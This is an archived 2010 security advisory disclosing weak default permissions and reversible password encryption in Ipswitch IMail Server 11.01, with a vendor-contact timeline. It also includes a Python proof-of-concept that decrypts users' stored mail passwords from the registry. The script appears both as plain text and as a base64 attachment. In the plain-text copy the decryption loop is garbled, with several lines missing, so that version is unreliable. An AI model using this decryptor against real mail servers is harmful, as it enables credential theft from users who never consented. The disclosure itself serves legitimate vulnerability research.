AOH :: HP Unsorted I :: BU-1708.HTM

Ipswitch IMAIL 11.01 multiple vulnerabilities (reversible encryption + weak ACL)



CORELAN-10-009 : Ipswitch IMAIL 11.01 multiple vulnerabilities (reversible encryption + weak ACL)
CORELAN-10-009 : Ipswitch IMAIL 11.01 multiple vulnerabilities (reversible encryption + weak ACL)



--_002_C0641B79F7D6A44791BA8FA35BC143F9016897B95340apollocorel_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
| http://www.corelan.be:8800 | 
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|

Advisory	: CORELAN-10-009
Disclosure Date	: Feb 4th, 2010

0x00 : Vulnerability Information

	[+] Product  : IMail Server
	[+] Version  : 11.01
	[+] Vendor   : Ipswitch
[+] URL	 : http://www.ipswitch.com/ 
	[+] Platform : Windows
	[+] Issue fix: No
	[+] Vulnerability discovered by: sinn3r
	[+] Greetings to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me/ekse/sinn3r/Jacky/jnz;
			  and all the guys with secret identities at exploit-db.com  :-p
	[+] Special thanks to: Jason from Ipswitch

0x01 : Vendor Description of Software

	"The Award-winning IMail Server is a proven email messaging solution for small and mid-sized businesses.
	 Reliable, scalable and versatile, IMail Server is an affordable choice that meets the messaging needs
	 of small and medium sized businesses. Unlike complicated and more expensive messaging solutions, IMail
	 Server delivers a quick and easy installation. As a scalable, standards-based, email server with Webmail,
	 optional integration with Microsoft Exchange ActiveSync(r), SMTP, POP, IMAP, LDAP, and List Server, IMail
	 users can send and receive email using any standards-based client, including Microsoft Outlook(r),
	 Outlook Express(r), or Eudora(r). Or, users can access email from anywhere via IMail's customizable Web
	 messaging, available in eight languages.

	 Designed to place minimal ongoing maintenance burden on network administrators, IMail can authenticate
	 users from its own database, an active directory database, or from any ODBC-compliant data store, making
	 life easier for the busy administrator. IMail Server also delivers a quick and easy installation or upgrade
	 process."

0x02 : Vulnerability Details

	1. By default, IMail allows Internet Guest Account to have "Full Control" to the following registry key,
	   including its subkeys and values. As well as the default IMail directory:
		HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail
		C:\Program Files\Ipswitch\IMail\

	2. The IMail password decryption algorithm implemented in IMailsec.dll is also reversible.

0x03 : Vendor Communication

	1/21/2010 - IMail vendor contacted
	1/26/2010 - Got a reply from the vendor (product development manager) for more vulnerability clarification.
		    No fix yet.
	2/02/2010 - Received another reply from the vendor: Issues logged for additional research.  No plans for
		    immediate changes.  A public advisory was also suggested by the vendor as reference in their
		    tech/KB article.
	2/04/2010 - Public disclosure: Advisory created.  Vendor informed.

0x04 : Exploit/Proof-of-Concept

#!/usr/bin/python

##########################################################################
# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
# Tested on: Windows XP SP3 (Windows version does not matter)
# Description:
# So I reverse engineered the IMail password decryption function in
# IMailsec.dll, located at 0x00563130.
#
# In order to decrypt correctly, you must have the correct username,
# because it is used as a key.
#
# All usernames and passwords are stored in registry, which can be
# found at:
# HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail\Domains\[domain name]\Users
# Every registry key under "Users" has a string value named "Password",
# in there you'll find the encrypted password.
#
# By default, Internet Guest Account is granted with "Full Control" to
# the IMail registry, and its directory.  That means if an attacker
# manages to gain code execution (ie.via a web app bug), IMail can be
# his/her next playground.  And IMail users may not be safe.
#
# Demo:
# sinn3r@bt4:~$ ./iMailDecrypt.py admin C8D3D19AA094
# Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
# coded by sinn3r  -  x90.sinner{at}gmail.c0m
# [*] Password = god123
#
# Responsible Disclosure Timeline:
# 1/21/2010  -  IMail vendor contacted
# 1/26/2010  -  Got a reply from the vendor for more vulnerability
#		clarfication.  No fix yet.
# 2/02/2010  -  Received another reply from the vendor: Issues logged for
#		additional research.  No plans for immediate changes.
#		A public advisory was also suggested by the vendor as
#		reference in their tech/KB article.
# 2/04/2010  -  Public Disclosure.  Vendor informed again.
##########################################################################

import sys
import binascii

## Convert the encrypted string to integers for calculation
## Returns the integer version as a list
def convertToInt(data):
	charset = []
	for char in (data):
		tmp = char.encode("hex")
		tmp = int(tmp, 16)
		charset.append(tmp)
	return charset
=09

## Decrypt the password
## Returns the decrypted version as a list
def decryptPassword(intUsername, intPassword):
	results = []
	counter = 0
	counter2 = 0
	pwdLength = len(intPassword)
	while counter 54:			#0x41
			if intUsername[counter2] < 90:		#5A
				intUsername[counter2] += 32	#0x20

		tmp -= intUsername[counter2]
		counter2 += 1

		results.append(hex(tmp)[2:])
		counter += 2
	return results

banner = """Ipswitch IMail Server - IMAP4 Server (IMail 11.01) Password Decryptor
coded by sinn3r  -  x90.sinner{at}gmail{d0t}c0m"""

print banner

if len(sys.argv) == 3:
	if len(sys.argv[2]) % 2 == 0:
		username = convertToInt(sys.argv[1])
		password = convertToInt(sys.argv[2])
		decryptor = str("".join(decryptPassword(username, password)))
		print "[*] Password = %s" %binascii.unhexlify(decryptor)
	else:
		print "[*] Incorrect Encrypted password length"
else:
	print "[*] Usage: %s  " %sys.argv[0]


--_002_C0641B79F7D6A44791BA8FA35BC143F9016897B95340apollocorel_
Content-Type: text/plain; name="corelan-10-009 ipswitch imail.txt"
Content-Description: corelan-10-009 ipswitch imail.txt
Content-Disposition: attachment;
	filename="corelan-10-009 ipswitch imail.txt"; size=6792;
	creation-date="Thu, 04 Feb 2010 23:39:32 GMT";
	modification-date="Thu, 04 Feb 2010 23:40:17 GMT"
Content-Transfer-Encoding: base64

fC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLXwNCnwgICAgICAgICAgICAgICAgICAgICAgICAgX18gICAgICAgICAgICAgICBf
XyAgICAgICAgICAgICAgICAgICAgICB8DQp8ICAgX19fX19fX19fICBfX19fX19fXyAgLyAvX19f
IF9fX19fICAgICAvIC9fX19fICBfX19fIF9fX19fIF9fXyAgfA0KfCAgLyBfX18vIF9fIFwvIF9f
Xy8gXyBcLyAvIF9fIGAvIF9fIFwgICAvIF9fLyBfIFwvIF9fIGAvIF9fIGBfXyBcIHwNCnwgLyAv
X18vIC9fLyAvIC8gIC8gIF9fLyAvIC9fLyAvIC8gLyAvICAvIC9fLyAgX18vIC9fLyAvIC8gLyAv
IC8gLyB8DQp8IFxfX18vXF9fX18vXy8gICBcX19fL18vXF9fLF8vXy8gL18vICAgXF9fL1xfX18v
XF9fLF8vXy8gL18vIC9fLyAgfA0KfCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHwNCnwgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICBodHRwOi8vd3d3LmNvcmVsYW4uYmU6ODgwMCB8DQp8ICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
fA0KfC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1bIEVJ
UCBIdW50ZXJzIF0tLXwNCg0KQWR2aXNvcnkJOiBDT1JFTEFOLTEwLTAwOQ0KRGlzY2xvc3VyZSBE
YXRlCTogRmViIDR0aCwgMjAxMA0KDQoweDAwIDogVnVsbmVyYWJpbGl0eSBJbmZvcm1hdGlvbg0K
DQoJWytdIFByb2R1Y3QgIDogSU1haWwgU2VydmVyDQoJWytdIFZlcnNpb24gIDogMTEuMDENCglb
K10gVmVuZG9yICAgOiBJcHN3aXRjaA0KCVsrXSBVUkwJICAgICA6IGh0dHA6Ly93d3cuaXBzd2l0
Y2guY29tLw0KCVsrXSBQbGF0Zm9ybSA6IFdpbmRvd3MNCglbK10gSXNzdWUgZml4OiBObw0KCVsr
XSBWdWxuZXJhYmlsaXR5IGRpc2NvdmVyZWQgYnk6IHNpbm4zcg0KCVsrXSBHcmVldGluZ3MgdG86
IENvcmVsYW4gU2VjdXJpdHkgVGVhbTo6Y29yZWxhbmMwZDNyL0VkaVN0cm9zYXIvUmljazI2MDAv
TWFya29UL21yX21lL2Vrc2Uvc2lubjNyL0phY2t5L2puejsNCgkJCSAgYW5kIGFsbCB0aGUgZ3V5
cyB3aXRoIHNlY3JldCBpZGVudGl0aWVzIGF0IGV4cGxvaXQtZGIuY29tICA6LXANCglbK10gU3Bl
Y2lhbCB0aGFua3MgdG86IEphc29uIGZyb20gSXBzd2l0Y2gNCg0KMHgwMSA6IFZlbmRvciBEZXNj
cmlwdGlvbiBvZiBTb2Z0d2FyZQ0KDQoJIlRoZSBBd2FyZC13aW5uaW5nIElNYWlsIFNlcnZlciBp
cyBhIHByb3ZlbiBlbWFpbCBtZXNzYWdpbmcgc29sdXRpb24gZm9yIHNtYWxsIGFuZCBtaWQtc2l6
ZWQgYnVzaW5lc3Nlcy4NCgkgUmVsaWFibGUsIHNjYWxhYmxlIGFuZCB2ZXJzYXRpbGUsIElNYWls
IFNlcnZlciBpcyBhbiBhZmZvcmRhYmxlIGNob2ljZSB0aGF0IG1lZXRzIHRoZSBtZXNzYWdpbmcg
bmVlZHMNCgkgb2Ygc21hbGwgYW5kIG1lZGl1bSBzaXplZCBidXNpbmVzc2VzLiBVbmxpa2UgY29t
cGxpY2F0ZWQgYW5kIG1vcmUgZXhwZW5zaXZlIG1lc3NhZ2luZyBzb2x1dGlvbnMsIElNYWlsDQoJ
IFNlcnZlciBkZWxpdmVycyBhIHF1aWNrIGFuZCBlYXN5IGluc3RhbGxhdGlvbi4gQXMgYSBzY2Fs
YWJsZSwgc3RhbmRhcmRzLWJhc2VkLCBlbWFpbCBzZXJ2ZXIgd2l0aCBXZWJtYWlsLA0KCSBvcHRp
b25hbCBpbnRlZ3JhdGlvbiB3aXRoIE1pY3Jvc29mdCBFeGNoYW5nZSBBY3RpdmVTeW5jriwgU01U
UCwgUE9QLCBJTUFQLCBMREFQLCBhbmQgTGlzdCBTZXJ2ZXIsIElNYWlsDQoJIHVzZXJzIGNhbiBz
ZW5kIGFuZCByZWNlaXZlIGVtYWlsIHVzaW5nIGFueSBzdGFuZGFyZHMtYmFzZWQgY2xpZW50LCBp
bmNsdWRpbmcgTWljcm9zb2Z0IE91dGxvb2uuLA0KCSBPdXRsb29rIEV4cHJlc3OuLCBvciBFdWRv
cmGuLiBPciwgdXNlcnMgY2FuIGFjY2VzcyBlbWFpbCBmcm9tIGFueXdoZXJlIHZpYSBJTWFpbCdz
IGN1c3RvbWl6YWJsZSBXZWINCgkgbWVzc2FnaW5nLCBhdmFpbGFibGUgaW4gZWlnaHQgbGFuZ3Vh
Z2VzLg0KDQoJIERlc2lnbmVkIHRvIHBsYWNlIG1pbmltYWwgb25nb2luZyBtYWludGVuYW5jZSBi
dXJkZW4gb24gbmV0d29yayBhZG1pbmlzdHJhdG9ycywgSU1haWwgY2FuIGF1dGhlbnRpY2F0ZQ0K
CSB1c2VycyBmcm9tIGl0cyBvd24gZGF0YWJhc2UsIGFuIGFjdGl2ZSBkaXJlY3RvcnkgZGF0YWJh
c2UsIG9yIGZyb20gYW55IE9EQkMtY29tcGxpYW50IGRhdGEgc3RvcmUsIG1ha2luZw0KCSBsaWZl
IGVhc2llciBmb3IgdGhlIGJ1c3kgYWRtaW5pc3RyYXRvci4gSU1haWwgU2VydmVyIGFsc28gZGVs
aXZlcnMgYSBxdWljayBhbmQgZWFzeSBpbnN0YWxsYXRpb24gb3IgdXBncmFkZQ0KCSBwcm9jZXNz
LiINCg0KMHgwMiA6IFZ1bG5lcmFiaWxpdHkgRGV0YWlscw0KDQoJMS4gQnkgZGVmYXVsdCwgSU1h
aWwgYWxsb3dzIEludGVybmV0IEd1ZXN0IEFjY291bnQgdG8gaGF2ZSAiRnVsbCBDb250cm9sIiB0
byB0aGUgZm9sbG93aW5nIHJlZ2lzdHJ5IGtleSwNCgkgICBpbmNsdWRpbmcgaXRzIHN1YmtleXMg
YW5kIHZhbHVlcy4gQXMgd2VsbCBhcyB0aGUgZGVmYXVsdCBJTWFpbCBkaXJlY3Rvcnk6DQoJCUhL
RVlfTE9DQUxfTUFDSElORVxTT0ZUV0FSRVxJcHN3aXRjaFxJTWFpbA0KCQlDOlxQcm9ncmFtIEZp
bGVzXElwc3dpdGNoXElNYWlsXA0KDQoJMi4gVGhlIElNYWlsIHBhc3N3b3JkIGRlY3J5cHRpb24g
YWxnb3JpdGhtIGltcGxlbWVudGVkIGluIElNYWlsc2VjLmRsbCBpcyBhbHNvIHJldmVyc2libGUu
DQoNCjB4MDMgOiBWZW5kb3IgQ29tbXVuaWNhdGlvbg0KDQoJMS8yMS8yMDEwIC0gSU1haWwgdmVu
ZG9yIGNvbnRhY3RlZA0KCTEvMjYvMjAxMCAtIEdvdCBhIHJlcGx5IGZyb20gdGhlIHZlbmRvciAo
cHJvZHVjdCBkZXZlbG9wbWVudCBtYW5hZ2VyKSBmb3IgbW9yZSB2dWxuZXJhYmlsaXR5IGNsYXJp
ZmljYXRpb24uDQoJCSAgICBObyBmaXggeWV0Lg0KCTIvMDIvMjAxMCAtIFJlY2VpdmVkIGFub3Ro
ZXIgcmVwbHkgZnJvbSB0aGUgdmVuZG9yOiBJc3N1ZXMgbG9nZ2VkIGZvciBhZGRpdGlvbmFsIHJl
c2VhcmNoLiAgTm8gcGxhbnMgZm9yDQoJCSAgICBpbW1lZGlhdGUgY2hhbmdlcy4gIEEgcHVibGlj
IGFkdmlzb3J5IHdhcyBhbHNvIHN1Z2dlc3RlZCBieSB0aGUgdmVuZG9yIGFzIHJlZmVyZW5jZSBp
biB0aGVpcg0KCQkgICAgdGVjaC9LQiBhcnRpY2xlLg0KCTIvMDQvMjAxMCAtIFB1YmxpYyBkaXNj
bG9zdXJlOiBBZHZpc29yeSBjcmVhdGVkLiAgVmVuZG9yIGluZm9ybWVkLg0KDQoweDA0IDogRXhw
bG9pdC9Qcm9vZi1vZi1Db25jZXB0DQoNCiMhL3Vzci9iaW4vcHl0aG9uDQoNCiMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjDQojIElwc3dpdGNoIElNYWlsIFNlcnZlciAtIElNQVA0IFNlcnZlciAoSU1haWwgMTEu
MDEpIFBhc3N3b3JkIERlY3J5cHRvcg0KIyBUZXN0ZWQgb246IFdpbmRvd3MgWFAgU1AzIChXaW5k
b3dzIHZlcnNpb24gZG9lcyBub3QgbWF0dGVyKQ0KIyBEZXNjcmlwdGlvbjoNCiMgU28gSSByZXZl
cnNlIGVuZ2luZWVyZWQgdGhlIElNYWlsIHBhc3N3b3JkIGRlY3J5cHRpb24gZnVuY3Rpb24gaW4N
CiMgSU1haWxzZWMuZGxsLCBsb2NhdGVkIGF0IDB4MDA1NjMxMzAuDQojDQojIEluIG9yZGVyIHRv
IGRlY3J5cHQgY29ycmVjdGx5LCB5b3UgbXVzdCBoYXZlIHRoZSBjb3JyZWN0IHVzZXJuYW1lLA0K
IyBiZWNhdXNlIGl0IGlzIHVzZWQgYXMgYSBrZXkuDQojDQojIEFsbCB1c2VybmFtZXMgYW5kIHBh
c3N3b3JkcyBhcmUgc3RvcmVkIGluIHJlZ2lzdHJ5LCB3aGljaCBjYW4gYmUNCiMgZm91bmQgYXQ6
DQojIEhLRVlfTE9DQUxfTUFDSElORVxTT0ZUV0FSRVxJcHN3aXRjaFxJTWFpbFxEb21haW5zXFtk
b21haW4gbmFtZV1cVXNlcnMNCiMgRXZlcnkgcmVnaXN0cnkga2V5IHVuZGVyICJVc2VycyIgaGFz
IGEgc3RyaW5nIHZhbHVlIG5hbWVkICJQYXNzd29yZCIsDQojIGluIHRoZXJlIHlvdSdsbCBmaW5k
IHRoZSBlbmNyeXB0ZWQgcGFzc3dvcmQuDQojDQojIEJ5IGRlZmF1bHQsIEludGVybmV0IEd1ZXN0
IEFjY291bnQgaXMgZ3JhbnRlZCB3aXRoICJGdWxsIENvbnRyb2wiIHRvDQojIHRoZSBJTWFpbCBy
ZWdpc3RyeSwgYW5kIGl0cyBkaXJlY3RvcnkuICBUaGF0IG1lYW5zIGlmIGFuIGF0dGFja2VyDQoj
IG1hbmFnZXMgdG8gZ2FpbiBjb2RlIGV4ZWN1dGlvbiAoaWUudmlhIGEgd2ViIGFwcCBidWcpLCBJ
TWFpbCBjYW4gYmUNCiMgaGlzL2hlciBuZXh0IHBsYXlncm91bmQuICBBbmQgSU1haWwgdXNlcnMg
bWF5IG5vdCBiZSBzYWZlLg0KIw0KIyBEZW1vOg0KIyBzaW5uM3JAYnQ0On4kIC4vaU1haWxEZWNy
eXB0LnB5IGFkbWluIEM4RDNEMTlBQTA5NA0KIyBJcHN3aXRjaCBJTWFpbCBTZXJ2ZXIgLSBJTUFQ
NCBTZXJ2ZXIgKElNYWlsIDExLjAxKSBQYXNzd29yZCBEZWNyeXB0b3INCiMgY29kZWQgYnkgc2lu
bjNyICAtICB4OTAuc2lubmVye2F0fWdtYWlsLmMwbQ0KIyBbKl0gUGFzc3dvcmQgPSBnb2QxMjMN
CiMNCiMgUmVzcG9uc2libGUgRGlzY2xvc3VyZSBUaW1lbGluZToNCiMgMS8yMS8yMDEwICAtICBJ
TWFpbCB2ZW5kb3IgY29udGFjdGVkDQojIDEvMjYvMjAxMCAgLSAgR290IGEgcmVwbHkgZnJvbSB0
aGUgdmVuZG9yIGZvciBtb3JlIHZ1bG5lcmFiaWxpdHkNCiMJCWNsYXJmaWNhdGlvbi4gIE5vIGZp
eCB5ZXQuDQojIDIvMDIvMjAxMCAgLSAgUmVjZWl2ZWQgYW5vdGhlciByZXBseSBmcm9tIHRoZSB2
ZW5kb3I6IElzc3VlcyBsb2dnZWQgZm9yDQojCQlhZGRpdGlvbmFsIHJlc2VhcmNoLiAgTm8gcGxh
bnMgZm9yIGltbWVkaWF0ZSBjaGFuZ2VzLg0KIwkJQSBwdWJsaWMgYWR2aXNvcnkgd2FzIGFsc28g
c3VnZ2VzdGVkIGJ5IHRoZSB2ZW5kb3IgYXMNCiMJCXJlZmVyZW5jZSBpbiB0aGVpciB0ZWNoL0tC
IGFydGljbGUuDQojIDIvMDQvMjAxMCAgLSAgUHVibGljIERpc2Nsb3N1cmUuICBWZW5kb3IgaW5m
b3JtZWQgYWdhaW4uDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQppbXBvcnQgc3lzDQppbXBvcnQgYmlu
YXNjaWkNCg0KIyMgQ29udmVydCB0aGUgZW5jcnlwdGVkIHN0cmluZyB0byBpbnRlZ2VycyBmb3Ig
Y2FsY3VsYXRpb24NCiMjIFJldHVybnMgdGhlIGludGVnZXIgdmVyc2lvbiBhcyBhIGxpc3QNCmRl
ZiBjb252ZXJ0VG9JbnQoZGF0YSk6DQoJY2hhcnNldCA9IFtdDQoJZm9yIGNoYXIgaW4gKGRhdGEp
Og0KCQl0bXAgPSBjaGFyLmVuY29kZSgiaGV4IikNCgkJdG1wID0gaW50KHRtcCwgMTYpDQoJCWNo
YXJzZXQuYXBwZW5kKHRtcCkNCglyZXR1cm4gY2hhcnNldA0KCQ0KDQojIyBEZWNyeXB0IHRoZSBw
YXNzd29yZA0KIyMgUmV0dXJucyB0aGUgZGVjcnlwdGVkIHZlcnNpb24gYXMgYSBsaXN0DQpkZWYg
ZGVjcnlwdFBhc3N3b3JkKGludFVzZXJuYW1lLCBpbnRQYXNzd29yZCk6DQoJcmVzdWx0cyA9IFtd
DQoJY291bnRlciA9IDANCgljb3VudGVyMiA9IDANCglwd2RMZW5ndGggPSBsZW4oaW50UGFzc3dv
cmQpDQoJd2hpbGUgY291bnRlcjxwd2RMZW5ndGg6DQoJCWZpcnN0Qnl0ZSA9IGludFBhc3N3b3Jk
W2NvdW50ZXJdDQoJCWlmIGZpcnN0Qnl0ZSA8PSA1NzoJCSMweDM5DQoJCQlmaXJzdEJ5dGUgLT0g
NDgJCSMweDMwDQoJCWVsc2U6DQoJCQlmaXJzdEJ5dGUgLT0gNTUJCSMweDM3DQoJCWZpcnN0Qnl0
ZSAqPSAxNgkJCSNTSEwgMHg0MA0KCQlzZWNvbmRCeXRlID0gaW50UGFzc3dvcmRbY291bnRlcisx
XQ0KCQlpZiBzZWNvbmRCeXRlIDw9IDU3OgkJIzB4MzkNCgkJCXNlY29uZEJ5dGUgLT0gNDgJIzB4
MzANCgkJZWxzZToNCgkJCXNlY29uZEJ5dGUgLT0gNTUJIzB4MzcNCgkJdG1wID0gZmlyc3RCeXRl
ICsgc2Vjb25kQnl0ZQ0KDQoJCWlmIGxlbihpbnRVc2VybmFtZSkgPD0gY291bnRlcjI6DQoJCQlj
b3VudGVyMiA9IDANCg0KCQlpZiBpbnRVc2VybmFtZVtjb3VudGVyMl0gPiA1NDoJCQkjMHg0MQ0K
CQkJaWYgaW50VXNlcm5hbWVbY291bnRlcjJdIDwgOTA6CQkjNUENCgkJCQlpbnRVc2VybmFtZVtj
b3VudGVyMl0gKz0gMzIJIzB4MjANCg0KCQl0bXAgLT0gaW50VXNlcm5hbWVbY291bnRlcjJdDQoJ
CWNvdW50ZXIyICs9IDENCg0KCQlyZXN1bHRzLmFwcGVuZChoZXgodG1wKVsyOl0pDQoJCWNvdW50
ZXIgKz0gMg0KCXJldHVybiByZXN1bHRzDQoNCmJhbm5lciA9ICIiIklwc3dpdGNoIElNYWlsIFNl
cnZlciAtIElNQVA0IFNlcnZlciAoSU1haWwgMTEuMDEpIFBhc3N3b3JkIERlY3J5cHRvcg0KY29k
ZWQgYnkgc2lubjNyICAtICB4OTAuc2lubmVye2F0fWdtYWlse2QwdH1jMG0iIiINCg0KcHJpbnQg
YmFubmVyDQoNCmlmIGxlbihzeXMuYXJndikgPT0gMzoNCglpZiBsZW4oc3lzLmFyZ3ZbMl0pICUg
MiA9PSAwOg0KCQl1c2VybmFtZSA9IGNvbnZlcnRUb0ludChzeXMuYXJndlsxXSkNCgkJcGFzc3dv
cmQgPSBjb252ZXJ0VG9JbnQoc3lzLmFyZ3ZbMl0pDQoJCWRlY3J5cHRvciA9IHN0cigiIi5qb2lu
KGRlY3J5cHRQYXNzd29yZCh1c2VybmFtZSwgcGFzc3dvcmQpKSkNCgkJcHJpbnQgIlsqXSBQYXNz
d29yZCA9ICVzIiAlYmluYXNjaWkudW5oZXhsaWZ5KGRlY3J5cHRvcikNCgllbHNlOg0KCQlwcmlu
dCAiWypdIEluY29ycmVjdCBFbmNyeXB0ZWQgcGFzc3dvcmQgbGVuZ3RoIg0KZWxzZToNCglwcmlu
dCAiWypdIFVzYWdlOiAlcyA8dXNlcm5hbWU+IDxlbmNyeXB0ZWQgcGFzc3dvcmQ+IiAlc3lzLmFy
Z3ZbMF0NCg0K

--_002_C0641B79F7D6A44791BA8FA35BC143F9016897B95340apollocorel_--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.